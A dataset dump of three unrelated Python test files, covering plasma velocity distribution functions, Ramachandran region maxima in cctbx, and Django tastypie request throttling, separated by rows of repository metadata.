            vy_drift=self.vy_drift2,
            vz_drift=self.vz_drift2,
            units="units",
        )
        errStr = f"Distribution function should be {testVal} and not {distFunc}."
        assert np.isclose(distFunc.value, testVal, rtol=1e-5, atol=0.0), errStr
class Test_Maxwellian_speed_3D(object):
    """Tests for the 3D Maxwellian speed distribution function."""

    @classmethod
    def setup_class(cls):
        """Set up parameters shared across the tests."""
        cls.T = 1.0 * u.eV
        cls.particle = "H+"
        # thermal speed used both directly and as the integration scale
        cls.vTh = thermal_speed(cls.T, particle=cls.particle, method="most_probable")
        cls.v = 1e5 * u.m / u.s
        cls.v_drift = 0 * u.m / u.s
        cls.v_drift2 = 1e5 * u.m / u.s
        # reference value of the distribution at v
        cls.distFuncTrue = 1.8057567503860518e-25

    def test_norm(self):
        """The speed distribution should integrate to unity."""
        # sample speeds from 0 out to 10 thermal speeds
        speeds = np.arange(0, 10.01, 0.01) * self.vTh
        pdf_vals = Maxwellian_speed_3D(v=speeds, T=self.T, particle=self.particle)
        # trapezoidal integration; expected to be close to 1
        area = spint.trapz(y=pdf_vals, x=speeds)
        failMsg = "Integral of distribution function should be 1."
        assert np.isclose(area.value, 1), failMsg

    def test_units_no_vTh(self):
        """Evaluate with units, letting the function derive vTh."""
        result = Maxwellian_speed_3D(
            T=self.T, v=self.v, particle=self.particle, units="units"
        )
        failMsg = (
            f"Distribution function should be {self.distFuncTrue} "
            f"and not {result}."
        )
        assert np.isclose(result.value, self.distFuncTrue, rtol=1e-5, atol=0.0), failMsg

    def test_units_vTh(self):
        """Evaluate with units and an explicitly supplied vTh."""
        result = Maxwellian_speed_3D(
            T=self.T, v=self.v, vTh=self.vTh, particle=self.particle, units="units"
        )
        failMsg = (
            f"Distribution function should be {self.distFuncTrue} "
            f"and not {result}."
        )
        assert np.isclose(result.value, self.distFuncTrue, rtol=1e-5, atol=0.0), failMsg

    def test_unitless_no_vTh(self):
        """Evaluate in unitless mode without supplying vTh."""
        # convert the temperature to kelvin and strip the units
        T_K = self.T.to(u.K, equivalencies=u.temperature_energy()).si.value
        result = Maxwellian_speed_3D(
            v=self.v.si.value, T=T_K, particle=self.particle, units="unitless"
        )
        failMsg = (
            f"Distribution function should be {self.distFuncTrue} "
            f"and not {result}."
        )
        assert np.isclose(result, self.distFuncTrue, rtol=1e-5, atol=0.0), failMsg

    def test_unitless_vTh(self):
        """Evaluate in unitless mode with an explicitly supplied vTh."""
        # convert the temperature to kelvin and strip the units
        T_K = self.T.to(u.K, equivalencies=u.temperature_energy()).si.value
        result = Maxwellian_speed_3D(
            v=self.v.si.value,
            T=T_K,
            vTh=self.vTh.si.value,
            particle=self.particle,
            units="unitless",
        )
        failMsg = (
            f"Distribution function should be {self.distFuncTrue} "
            f"and not {result}."
        )
        assert np.isclose(result, self.distFuncTrue, rtol=1e-5, atol=0.0), failMsg

    def test_zero_drift_units(self):
        """A drift of exactly 0 (with units) must leave the result unchanged."""
        result = Maxwellian_speed_3D(
            v=self.v,
            T=self.T,
            particle=self.particle,
            v_drift=self.v_drift,
            units="units",
        )
        failMsg = (
            f"Distribution function should be {self.distFuncTrue} "
            f"and not {result}."
        )
        assert np.isclose(result.value, self.distFuncTrue, rtol=1e-5, atol=0.0), failMsg

    def test_value_drift_units(self):
        """Non-zero drifts are not implemented for speed distributions."""
        with pytest.raises(NotImplementedError):
            Maxwellian_speed_3D(
                v=self.v,
                T=self.T,
                particle=self.particle,
                v_drift=self.v_drift2,
                units="units",
            )
class Test_kappa_velocity_1D(object):
    """Tests for the 1D kappa velocity distribution function."""

    @classmethod
    def setup_class(cls):
        """Initialize parameters shared by all tests."""
        cls.T_e = 30000 * u.K
        cls.kappa = 4
        # kappa must be > 3/2 for the distribution to be defined
        cls.kappaInvalid = 3 / 2
        cls.v = 1e5 * u.m / u.s
        cls.v_drift = 1000000 * u.m / u.s
        cls.v_drift2 = 0 * u.m / u.s
        cls.v_drift3 = 1e5 * u.m / u.s
        cls.start = -5000
        cls.stop = -cls.start
        cls.dv = 10000 * u.m / u.s
        # symmetric grid of velocities for moment/argmax tests
        cls.v_vect = np.arange(cls.start, cls.stop, dtype="float64") * cls.dv
        cls.particle = "e"
        cls.vTh = kappa_thermal_speed(
            cls.T_e, kappa=cls.kappa, particle=cls.particle
        )
        # expected value of the distribution at v
        cls.distFuncTrue = 6.637935187755855e-07

    def test_invalid_kappa(self):
        """
        Checks if function raises error when kappa <= 3/2 is passed as an
        argument.
        """
        with pytest.raises(ValueError):
            kappa_velocity_1D(
                v=self.v,
                T=self.T_e,
                kappa=self.kappaInvalid,
                particle=self.particle,
                units="units",
            )

    def test_max_noDrift(self):
        """
        Checks maximum value of distribution function is in expected place,
        when there is no drift applied.
        """
        max_index = kappa_velocity_1D(
            self.v_vect,
            T=self.T_e,
            kappa=self.kappa,
            particle=self.particle,
            v_drift=0 * u.m / u.s,
        ).argmax()
        assert np.isclose(self.v_vect[max_index].value, 0.0)

    def test_max_drift(self):
        """
        Checks maximum value of distribution function is in expected place,
        when there is drift applied.
        """
        max_index = kappa_velocity_1D(
            self.v_vect,
            T=self.T_e,
            kappa=self.kappa,
            particle=self.particle,
            v_drift=self.v_drift,
        ).argmax()
        assert np.isclose(self.v_vect[max_index].value, self.v_drift.value)

    def test_maxwellian_limit(self):
        """
        Tests the limit of large kappa to see if kappa distribution function
        converges to Maxwellian.
        """
        # TODO: this test is a placeholder and currently checks nothing.
        return

    def test_norm(self):
        """
        Tests whether distribution function is normalized, and integrates to 1.
        """
        # converting vTh to unitless
        vTh = self.vTh.si.value
        # setting up integration from -10*vTh to 10*vTh, which is close to Inf
        infApprox = 10 * vTh
        # integrating, this should be close to 1
        integ = spint.quad(
            kappa_velocity_1D,
            -infApprox,
            infApprox,
            args=(self.T_e, self.kappa, self.particle, 0, vTh, "unitless"),
            epsabs=1e0,
            epsrel=1e0,
        )
        # value returned from quad is (integral, error), we just need
        # the 1st
        integVal = integ[0]
        # Fix: this was a plain string, so {integVal} was never interpolated;
        # it must be an f-string for the failure message to be useful.
        exceptStr = (
            f"Integral of distribution function should be 1 and not {integVal}."
        )
        assert np.isclose(integVal, 1, rtol=1e-3, atol=0.0), exceptStr

    def test_std(self):
        """
        Checks that the second moment of the sampled distribution recovers
        the input temperature T_e.
        """
        # discrete second moment: sum f(v) * v^2 * dv over the velocity grid
        std = (
            kappa_velocity_1D(
                self.v_vect, T=self.T_e, kappa=self.kappa, particle=self.particle
            )
            * self.v_vect ** 2
            * self.dv
        ).sum()
        std = np.sqrt(std)
        # convert the velocity spread back to a temperature
        T_distri = (std ** 2 / k_B * m_e).to(u.K)
        assert np.isclose(T_distri.value, self.T_e.value)

    def test_units_no_vTh(self):
        """
        Tests distribution function with units, but not passing vTh.
        """
        distFunc = kappa_velocity_1D(
            v=self.v,
            T=self.T_e,
            kappa=self.kappa,
            particle=self.particle,
            units="units",
        )
        errStr = (
            f"Distribution function should be {self.distFuncTrue} "
            f"and not {distFunc}."
        )
        assert np.isclose(
            distFunc.value, self.distFuncTrue, rtol=1e-5, atol=0.0
        ), errStr

    def test_units_vTh(self):
        """
        Tests distribution function with units and passing vTh.
        """
        distFunc = kappa_velocity_1D(
            v=self.v,
            T=self.T_e,
            kappa=self.kappa,
            vTh=self.vTh,
            particle=self.particle,
            units="units",
        )
        errStr = (
            f"Distribution function should be {self.distFuncTrue} "
            f"and not {distFunc}."
        )
        assert np.isclose(
            distFunc.value, self.distFuncTrue, rtol=1e-5, atol=0.0
        ), errStr

    def test_unitless_no_vTh(self):
        """
        Tests distribution function without units, and not passing vTh.
        """
        # converting T to SI then stripping units
        T_e = self.T_e.to(u.K, equivalencies=u.temperature_energy())
        T_e = T_e.si.value
        distFunc = kappa_velocity_1D(
            v=self.v.si.value,
            T=T_e,
            kappa=self.kappa,
            particle=self.particle,
            units="unitless",
        )
        errStr = (
            f"Distribution function should be {self.distFuncTrue} "
            f"and not {distFunc}."
        )
        assert np.isclose(distFunc, self.distFuncTrue, rtol=1e-5, atol=0.0), errStr

    def test_unitless_vTh(self):
        """
        Tests distribution function without units, and with passing vTh.
        """
        # converting T to SI then stripping units
        T_e = self.T_e.to(u.K, equivalencies=u.temperature_energy())
        T_e = T_e.si.value
        distFunc = kappa_velocity_1D(
            v=self.v.si.value,
            T=T_e,
            kappa=self.kappa,
            vTh=self.vTh.si.value,
            particle=self.particle,
            units="unitless",
        )
        errStr = (
            f"Distribution function should be {self.distFuncTrue} "
            f"and not {distFunc}."
        )
        assert np.isclose(distFunc, self.distFuncTrue, rtol=1e-5, atol=0.0), errStr

    def test_zero_drift_units(self):
        """
        Testing inputting drift equal to 0 with units. These should just
        get passed and not have extra units applied to them.
        """
        distFunc = kappa_velocity_1D(
            v=self.v,
            T=self.T_e,
            kappa=self.kappa,
            particle=self.particle,
            v_drift=self.v_drift2,
            units="units",
        )
        errStr = (
            f"Distribution function should be {self.distFuncTrue} "
            f"and not {distFunc}."
        )
        assert np.isclose(
            distFunc.value, self.distFuncTrue, rtol=1e-5, atol=0.0
        ), errStr

    def test_value_drift_units(self):
        """
        Testing vdrifts with values
        """
        testVal = 6.755498543630533e-07
        distFunc = kappa_velocity_1D(
            v=self.v,
            T=self.T_e,
            kappa=self.kappa,
            particle=self.particle,
            v_drift=self.v_drift3,
            units="units",
        )
        errStr = f"Distribution function should be {testVal} and not {distFunc}."
        assert np.isclose(distFunc.value, testVal, rtol=1e-5, atol=0.0), errStr
@pytest.mark.slow
class Test_kappa_velocity_3D(object):
    """Tests for the 3D kappa velocity distribution function."""

    @classmethod
    def setup_class(cls):
        """Initialize parameters shared by all tests."""
        cls.T = 1.0 * u.eV
        cls.kappa = 4
        # kappa must be > 3/2 for the distribution to be defined
        cls.kappaInvalid = 3 / 2
        cls.particle = "H+"
        # get thermal velocity and thermal velocity squared
        cls.vTh = kappa_thermal_speed(cls.T, kappa=cls.kappa, particle=cls.particle)
        cls.vx = 1e5 * u.m / u.s
        cls.vy = 1e5 * u.m / u.s
        cls.vz = 1e5 * u.m / u.s
        cls.vx_drift = 0 * u.m / u.s
        cls.vy_drift = 0 * u.m / u.s
        cls.vz_drift = 0 * u.m / u.s
        cls.vx_drift2 = 1e5 * u.m / u.s
        cls.vy_drift2 = 1e5 * u.m / u.s
        cls.vz_drift2 = 1e5 * u.m / u.s
        # expected value of the distribution at (vx, vy, vz)
        cls.distFuncTrue = 1.1847914288918793e-22

    def test_invalid_kappa(self):
        """
        Checks if function raises error when kappa <= 3/2 is passed as an
        argument.
        """
        with pytest.raises(ValueError):
            kappa_velocity_3D(
                vx=self.vx,
                vy=self.vy,
                vz=self.vz,
                T=self.T,
                kappa=self.kappaInvalid,
                particle=self.particle,
                units="units",
            )

    # TODO: a test_maxwellian_limit (comparing kappa_velocity_3D at large
    # kappa against Maxwellian_velocity_3D) was previously drafted here but
    # disabled; re-add once the effective-temperature conversion is settled.

    def test_norm(self):
        """
        Tests whether distribution function is normalized, and integrates to 1.
        """
        # converting vTh to unitless
        vTh = self.vTh.si.value
        # setting up integration from -10*vTh to 10*vTh, which is close to Inf
        infApprox = 10 * vTh
        # integrating, this should be close to 1
        integ = spint.tplquad(
            kappa_velocity_3D,
            -infApprox,
            infApprox,
            lambda z: -infApprox,
            lambda z: infApprox,
            lambda z, y: -infApprox,
            lambda z, y: infApprox,
            args=(self.T, self.kappa, self.particle, 0, 0, 0, vTh, "unitless"),
            epsabs=1e0,
            epsrel=1e0,
        )
        # value returned from tplquad is (integral, error), we just need
        # the 1st
        integVal = integ[0]
        # Fix: this was a plain string, so {integVal} was never interpolated;
        # it must be an f-string for the failure message to be useful.
        exceptStr = (
            f"Integral of distribution function should be 1 and not {integVal}."
        )
        assert np.isclose(integVal, 1, rtol=1e-3, atol=0.0), exceptStr

    def test_units_no_vTh(self):
        """
        Tests distribution function with units, but not passing vTh.
        """
        distFunc = kappa_velocity_3D(
            vx=self.vx,
            vy=self.vy,
            vz=self.vz,
            T=self.T,
            kappa=self.kappa,
            particle=self.particle,
            units="units",
        )
        errStr = (
            f"Distribution function should be {self.distFuncTrue} "
            f"and not {distFunc}."
        )
        assert np.isclose(
            distFunc.value, self.distFuncTrue, rtol=1e-5, atol=0.0
        ), errStr

    def test_units_vTh(self):
        """
        Tests distribution function with units and passing vTh.
        """
        distFunc = kappa_velocity_3D(
            vx=self.vx,
            vy=self.vy,
            vz=self.vz,
            T=self.T,
            kappa=self.kappa,
            vTh=self.vTh,
            particle=self.particle,
            units="units",
        )
        errStr = (
            f"Distribution function should be {self.distFuncTrue} "
            f"and not {distFunc}."
        )
        assert np.isclose(
            distFunc.value, self.distFuncTrue, rtol=1e-5, atol=0.0
        ), errStr

    def test_unitless_no_vTh(self):
        """
        Tests distribution function without units, and not passing vTh.
        """
        # converting T to SI then stripping units
        T = self.T.to(u.K, equivalencies=u.temperature_energy())
        T = T.si.value
        distFunc = kappa_velocity_3D(
            vx=self.vx.si.value,
            vy=self.vy.si.value,
            vz=self.vz.si.value,
            T=T,
            kappa=self.kappa,
            particle=self.particle,
            units="unitless",
        )
        errStr = (
            f"Distribution function should be {self.distFuncTrue} "
            f"and not {distFunc}."
        )
        assert np.isclose(distFunc, self.distFuncTrue, rtol=1e-5, atol=0.0), errStr

    def test_unitless_vTh(self):
        """
        Tests distribution function without units, and with passing vTh.
        """
        # converting T to SI then stripping units
        T = self.T.to(u.K, equivalencies=u.temperature_energy())
        T = T.si.value
        distFunc = kappa_velocity_3D(
            vx=self.vx.si.value,
            vy=self.vy.si.value,
            vz=self.vz.si.value,
            T=T,
            kappa=self.kappa,
            vTh=self.vTh.si.value,
            particle=self.particle,
            units="unitless",
        )
        errStr = (
            f"Distribution function should be {self.distFuncTrue} "
            f"and not {distFunc}."
        )
        assert np.isclose(distFunc, self.distFuncTrue, rtol=1e-5, atol=0.0), errStr

    def test_zero_drift_units(self):
        """
        Testing inputting drift equal to 0 with units. These should just
        get passed and not have extra units applied to them.
        """
        distFunc = kappa_velocity_3D(
            vx=self.vx,
            vy=self.vy,
            vz=self.vz,
            T=self.T,
            kappa=self.kappa,
            particle=self.particle,
            vx_drift=self.vx_drift,
            vy_drift=self.vy_drift,
            vz_drift=self.vz_drift,
            units="units",
        )
        errStr = (
            f"Distribution function should be {self.distFuncTrue} "
            f"and not {distFunc}."
        )
        assert np.isclose(
            distFunc.value, self.distFuncTrue, rtol=1e-5, atol=0.0
        ), errStr

    def test_value_drift_units(self):
        """
        Testing vdrifts with values
        """
        testVal = 1.2376545373917465e-13
        distFunc = kappa_velocity_3D(
            vx=self.vx,
            vy=self.vy,
            vz=self.vz,
            T=self.T,
            kappa=self.kappa,
            particle=self.particle,
            vx_drift=self.vx_drift2,
            vy_drift=self.vy_drift2,
            vz_drift=self.vz_drift2,
            units="units",
        )
        errStr = f"Distribution function should be {testVal} and not {distFunc}."
        assert np.isclose(distFunc.value, testVal, rtol=1e-5, atol=0.0), errStr
| 34.00365
| 88
| 0.544381
| 5,597
| 46,585
| 4.435769
| 0.040021
| 0.081363
| 0.055585
| 0.062029
| 0.961775
| 0.960164
| 0.957707
| 0.954042
| 0.946027
| 0.942321
| 0
| 0.0276
| 0.353676
| 46,585
| 1,369
| 89
| 34.028488
| 0.796971
| 0.185661
| 0
| 0.834356
| 0
| 0
| 0.113488
| 0
| 0
| 0
| 0
| 0
| 0.06135
| 1
| 0.074642
| false
| 0
| 0.007157
| 0
| 0.091002
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6a25ac858ed06e45c3308468c609b2e361f48812
| 5,309
|
py
|
Python
|
mmtbx/validation/regression/tst_find_region_max_value.py
|
rimmartin/cctbx_project
|
644090f9432d9afc22cfb542fc3ab78ca8e15e5d
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
mmtbx/validation/regression/tst_find_region_max_value.py
|
rimmartin/cctbx_project
|
644090f9432d9afc22cfb542fc3ab78ca8e15e5d
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
mmtbx/validation/regression/tst_find_region_max_value.py
|
rimmartin/cctbx_project
|
644090f9432d9afc22cfb542fc3ab78ca8e15e5d
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
from __future__ import division
from mmtbx.validation.ramalyze import find_region_max_value
from mmtbx.validation.ramalyze import RAMA_GENERAL, RAMA_GLYCINE, RAMA_CISPRO, \
RAMA_TRANSPRO, RAMA_PREPRO, RAMA_ILE_VAL
def exercise_1():
  """Regression checks for find_region_max_value over the Ramachandran tables.

  Each group asserts that phi/psi points falling in one contoured region map
  to that region's (phi, psi) peak coordinates and peak value.

  Fix: the original used Python-2-only ``print`` statements; ``print(...)``
  calls work under both Python 2 and 3.
  """
  # ((-63.0, -43.0), 1.0)
  print(find_region_max_value(RAMA_GENERAL, -100, 0))
  assert find_region_max_value(RAMA_GENERAL, -100, 0) == ((-63.0, -43.0), 1.0)
  assert find_region_max_value(RAMA_GENERAL, -120, 40) == ((-63.0, -43.0), 1.0)
  assert find_region_max_value(RAMA_GENERAL, -45, -55) == ((-63.0, -43.0), 1.0)
  # a point outside any contoured region has no maximum
  assert find_region_max_value(RAMA_GENERAL, 0, 0) is None
  # ((-115.0, 131.0), 0.57068)
  assert find_region_max_value(RAMA_GENERAL, -80, 100) == ((-115.0, 131.0), 0.57068)
  assert find_region_max_value(RAMA_GENERAL, -160, 179) == ((-115.0, 131.0), 0.57068)
  assert find_region_max_value(RAMA_GENERAL, -80, 60) == ((-115.0, 131.0), 0.57068)
  assert find_region_max_value(RAMA_GENERAL, -120, -179) == ((-115.0, 131.0), 0.57068)
  # ((53.0, 43.0), 0.323004)
  assert find_region_max_value(RAMA_GENERAL, 60, 40) == ((53.0, 43.0), 0.323004)
  assert find_region_max_value(RAMA_GENERAL, 75, 0) == ((53.0, 43.0), 0.323004)
  assert find_region_max_value(RAMA_GENERAL, 60, 60) == ((53.0, 43.0), 0.323004)
  # ((53.0, -127.0), 0.0246619)
  assert find_region_max_value(RAMA_GENERAL, 53, -127) == ((53.0, -127.0), 0.0246619)
  assert find_region_max_value(RAMA_GENERAL, 54, -128) == ((53.0, -127.0), 0.0246619)
  assert find_region_max_value(RAMA_GENERAL, 53, -130) == ((53.0, -127.0), 0.0246619)
  print("==================================================")
  # ((-63.0, -41.0), 1.0)
  assert find_region_max_value(RAMA_GLYCINE, -80, -20) == ((-63.0, -41.0), 1.0)
  assert find_region_max_value(RAMA_GLYCINE, -80, 60) == ((-63.0, -41.0), 1.0)
  assert find_region_max_value(RAMA_GLYCINE, -80, 65) == ((-63.0, -41.0), 1.0)
  # ((63.0, 41.0), 1.0)
  assert find_region_max_value(RAMA_GLYCINE, 80, 0) == ((63.0, 41.0), 1.0)
  assert find_region_max_value(RAMA_GLYCINE, 80, -60) == ((63.0, 41.0), 1.0)
  # ((79.0, -173.0), 0.553852)
  assert find_region_max_value(RAMA_GLYCINE, 100, -160) == ((79.0, -173.0), 0.553852)
  assert find_region_max_value(RAMA_GLYCINE, 120, 160) == ((79.0, -173.0), 0.553852)
  assert find_region_max_value(RAMA_GLYCINE, -100, 140) == ((79.0, -173.0), 0.553852)
  assert find_region_max_value(RAMA_GLYCINE, -100, -160) == ((79.0, -173.0), 0.553852)
  print("==================================================")
  # ((-89.0, 5.0), 0.701149)
  assert find_region_max_value(RAMA_CISPRO, -80, 0) == ((-89.0, 5.0), 0.701149)
  assert find_region_max_value(RAMA_CISPRO, -60, -20) == ((-89.0, 5.0), 0.701149)
  assert find_region_max_value(RAMA_CISPRO, -100, 40) == ((-89.0, 5.0), 0.701149)
  # ((-75.0, 155.0), 1.0)
  assert find_region_max_value(RAMA_CISPRO, -80, 140) == ((-75.0, 155.0), 1.0)
  assert find_region_max_value(RAMA_CISPRO, -80, -178) == ((-75.0, 155.0), 1.0)
  print("==================================================")
  # ((-57.0, -37.0), 0.99566)
  assert find_region_max_value(RAMA_TRANSPRO, -60, -20) == ((-57.0, -37.0), 0.99566)
  assert find_region_max_value(RAMA_TRANSPRO, -80, 0) == ((-57.0, -37.0), 0.99566)
  assert find_region_max_value(RAMA_TRANSPRO, -40, -40) == ((-57.0, -37.0), 0.99566)
  # ((-81.0, 65.0), 0.0896269)
  assert find_region_max_value(RAMA_TRANSPRO, -80, 60) == ((-81.0, 65.0), 0.0896269)
  # ((-59.0, 143.0), 1.0)
  assert find_region_max_value(RAMA_TRANSPRO, -60, 140) == ((-59.0, 143.0), 1.0)
  assert find_region_max_value(RAMA_TRANSPRO, -80, -179) == ((-59.0, 143.0), 1.0)
  print("==================================================")
  # ((-67.0, 147.0), 0.992025)  [comment corrected to match the asserts below]
  assert find_region_max_value(RAMA_PREPRO, -120, 140) == ((-67.0, 147.0), 0.992025)
  assert find_region_max_value(RAMA_PREPRO, -120, 60) == ((-67.0, 147.0), 0.992025)
  assert find_region_max_value(RAMA_PREPRO, -160, 80) == ((-67.0, 147.0), 0.992025)
  assert find_region_max_value(RAMA_PREPRO, -160, 160) == ((-67.0, 147.0), 0.992025)
  # ((-57.0, -45.0), 1.0)
  assert find_region_max_value(RAMA_PREPRO, -60, -40) == ((-57.0, -45.0), 1.0)
  assert find_region_max_value(RAMA_PREPRO, -45, -55) == ((-57.0, -45.0), 1.0)
  # ((49.0, 57.0), 0.185259)
  assert find_region_max_value(RAMA_PREPRO, 49, 57) == ((49.0, 57.0), 0.185259)
  assert find_region_max_value(RAMA_PREPRO, 60, 60) == ((49.0, 57.0), 0.185259)
  assert find_region_max_value(RAMA_PREPRO, 55, 55) == ((49.0, 57.0), 0.185259)
  print("==================================================")
  # ((-63.0, -45.0), 1.0)
  assert find_region_max_value(RAMA_ILE_VAL, -60, -40) == ((-63.0, -45.0), 1.0)
  assert find_region_max_value(RAMA_ILE_VAL, -120, -60) == ((-63.0, -45.0), 1.0)
  assert find_region_max_value(RAMA_ILE_VAL, -120, 20) == ((-63.0, -45.0), 1.0)
  assert find_region_max_value(RAMA_ILE_VAL, -80, 0) == ((-63.0, -45.0), 1.0)
  # ((-121.0, 129.0), 0.76163)
  assert find_region_max_value(RAMA_ILE_VAL, -100, 140) == ((-121.0, 129.0), 0.76163)
  assert find_region_max_value(RAMA_ILE_VAL, -160, 140) == ((-121.0, 129.0), 0.76163)
  assert find_region_max_value(RAMA_ILE_VAL, -60, 140) == ((-121.0, 129.0), 0.76163)
  assert find_region_max_value(RAMA_ILE_VAL, -130, -179) == ((-121.0, 129.0), 0.76163)
# Allow running this regression test directly as a script.
if __name__ == '__main__':
  exercise_1()
| 55.884211
| 86
| 0.619326
| 923
| 5,309
| 3.302275
| 0.087757
| 0.173885
| 0.22605
| 0.312992
| 0.89895
| 0.877297
| 0.821522
| 0.814961
| 0.759186
| 0.757874
| 0
| 0.219175
| 0.127708
| 5,309
| 94
| 87
| 56.478723
| 0.438998
| 0.078358
| 0
| 0.078125
| 0
| 0
| 0.052923
| 0.051282
| 0
| 0
| 0
| 0
| 0.796875
| 0
| null | null | 0
| 0.046875
| null | null | 0.09375
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
6a275f1e924eb96e8737876c7d9814c3b0822ab5
| 6,262
|
py
|
Python
|
tests/core/tests/throttle.py
|
uditagarwal/tastypie
|
ece398310040e9ddfeeacee6a699beb1dee6dad6
|
[
"BSD-3-Clause"
] | 1
|
2015-05-20T16:20:43.000Z
|
2015-05-20T16:20:43.000Z
|
tests/core/tests/throttle.py
|
uditagarwal/tastypie
|
ece398310040e9ddfeeacee6a699beb1dee6dad6
|
[
"BSD-3-Clause"
] | 3
|
2016-10-25T12:00:28.000Z
|
2022-02-10T10:04:24.000Z
|
tests/core/tests/throttle.py
|
uditagarwal/tastypie
|
ece398310040e9ddfeeacee6a699beb1dee6dad6
|
[
"BSD-3-Clause"
] | 1
|
2019-09-29T04:13:39.000Z
|
2019-09-29T04:13:39.000Z
|
import time
from django.core.cache import cache
from django.test import TestCase
from django.utils.encoding import force_text
from tastypie.models import ApiAccess
from tastypie.throttle import BaseThrottle, CacheThrottle, CacheDBThrottle
class NoThrottleTestCase(TestCase):
    """Exercise the no-op ``BaseThrottle``."""

    def test_init(self):
        # Defaults.
        default_throttle = BaseThrottle()
        self.assertEqual(default_throttle.throttle_at, 150)
        self.assertEqual(default_throttle.timeframe, 3600)
        self.assertEqual(default_throttle.expiration, 604800)
        # Explicit overrides.
        custom_throttle = BaseThrottle(throttle_at=50, timeframe=60 * 30, expiration=1)
        self.assertEqual(custom_throttle.throttle_at, 50)
        self.assertEqual(custom_throttle.timeframe, 1800)
        self.assertEqual(custom_throttle.expiration, 1)

    def test_convert_identifier_to_key(self):
        throttle = BaseThrottle()
        # Per these expectations, disallowed characters (spaces, symbols)
        # are stripped and the '_accesses' suffix is appended.
        expectations = [
            ('', '_accesses'),
            ('alnum10', 'alnum10_accesses'),
            ('Mr. Pants', 'Mr.Pants_accesses'),
            ('Mr_Pants', 'Mr_Pants_accesses'),
            ('%^@@$&!a', 'a_accesses'),
        ]
        for identifier, expected in expectations:
            self.assertEqual(throttle.convert_identifier_to_key(identifier), expected)

    def test_should_be_throttled(self):
        # The base implementation never throttles.
        self.assertEqual(BaseThrottle().should_be_throttled('foobaz'), False)

    def test_accessed(self):
        # The base implementation records nothing and returns None.
        self.assertEqual(BaseThrottle().accessed('foobaz'), None)
class CacheThrottleTestCase(TestCase):
    """Exercise ``CacheThrottle`` against the Django cache backend."""

    def tearDown(self):
        # Drop any access records a test left behind.
        cache.delete('daniel_accesses')
        cache.delete('cody_accesses')

    def test_throttling(self):
        throttle = CacheThrottle(throttle_at=2, timeframe=5, expiration=2)
        # First check seeds an empty access list and does not throttle.
        self.assertEqual(throttle.should_be_throttled('daniel'), False)
        self.assertEqual(len(cache.get('daniel_accesses')), 0)
        self.assertEqual(throttle.accessed('daniel'), None)
        self.assertEqual(throttle.should_be_throttled('daniel'), False)
        self.assertEqual(len(cache.get('daniel_accesses')), 1)
        self.assertEqual(cache.get('cody_accesses'), None)
        # Record more accesses for both identifiers.
        self.assertEqual(throttle.accessed('daniel'), None)
        self.assertEqual(throttle.accessed('cody'), None)
        self.assertEqual(throttle.should_be_throttled('cody'), False)
        self.assertEqual(len(cache.get('daniel_accesses')), 2)
        self.assertEqual(len(cache.get('cody_accesses')), 1)
        # Past the limit: daniel is now throttled.
        self.assertEqual(throttle.should_be_throttled('daniel'), True)
        self.assertEqual(len(cache.get('daniel_accesses')), 2)
        self.assertEqual(throttle.accessed('daniel'), None)
        self.assertEqual(throttle.should_be_throttled('daniel'), True)
        self.assertEqual(len(cache.get('daniel_accesses')), 3)
        self.assertEqual(throttle.accessed('daniel'), None)
        # A different identifier is unaffected.
        self.assertEqual(throttle.should_be_throttled('cody'), False)
        self.assertEqual(throttle.accessed('cody'), None)
        # Once the timeframe lapses, old accesses fall out of the window.
        time.sleep(3)
        self.assertEqual(throttle.should_be_throttled('daniel'), False)
        self.assertEqual(len(cache.get('daniel_accesses')), 0)
class CacheDBThrottleTestCase(TestCase):
    """Exercise ``CacheDBThrottle``, which records accesses in the cache and
    also persists ``ApiAccess`` rows in the database."""

    def tearDown(self):
        # Drop any access records a test left behind.
        cache.delete('daniel_accesses')
        cache.delete('cody_accesses')

    def test_throttling(self):
        throttle = CacheDBThrottle(throttle_at=2, timeframe=5, expiration=2)
        # Nothing recorded yet, neither in the cache nor the DB.
        self.assertEqual(throttle.should_be_throttled('daniel'), False)
        self.assertEqual(len(cache.get('daniel_accesses')), 0)
        self.assertEqual(ApiAccess.objects.count(), 0)
        self.assertEqual(ApiAccess.objects.filter(identifier='daniel').count(), 0)
        # One access: cache list grows and a DB row is written.
        self.assertEqual(throttle.accessed('daniel'), None)
        self.assertEqual(throttle.should_be_throttled('daniel'), False)
        self.assertEqual(len(cache.get('daniel_accesses')), 1)
        self.assertEqual(cache.get('cody_accesses'), None)
        self.assertEqual(ApiAccess.objects.count(), 1)
        self.assertEqual(ApiAccess.objects.filter(identifier='daniel').count(), 1)
        # More accesses for both identifiers.
        self.assertEqual(throttle.accessed('daniel'), None)
        self.assertEqual(throttle.accessed('cody'), None)
        self.assertEqual(throttle.should_be_throttled('cody'), False)
        self.assertEqual(len(cache.get('daniel_accesses')), 2)
        self.assertEqual(len(cache.get('cody_accesses')), 1)
        self.assertEqual(ApiAccess.objects.count(), 3)
        self.assertEqual(ApiAccess.objects.filter(identifier='daniel').count(), 2)
        self.assertEqual(throttle.accessed('cody'), None)
        # Past the limit: daniel is now throttled, but accesses keep
        # accumulating in both the cache and the DB.
        self.assertEqual(throttle.accessed('daniel'), None)
        self.assertEqual(throttle.should_be_throttled('daniel'), True)
        self.assertEqual(len(cache.get('daniel_accesses')), 3)
        self.assertEqual(ApiAccess.objects.count(), 5)
        self.assertEqual(ApiAccess.objects.filter(identifier='daniel').count(), 3)
        self.assertEqual(throttle.accessed('daniel'), None)
        self.assertEqual(throttle.should_be_throttled('daniel'), True)
        self.assertEqual(len(cache.get('daniel_accesses')), 4)
        self.assertEqual(ApiAccess.objects.count(), 6)
        self.assertEqual(ApiAccess.objects.filter(identifier='daniel').count(), 4)
        # cody has also hit the limit by now.
        self.assertEqual(throttle.should_be_throttled('cody'), True)
        self.assertEqual(throttle.accessed('cody'), None)
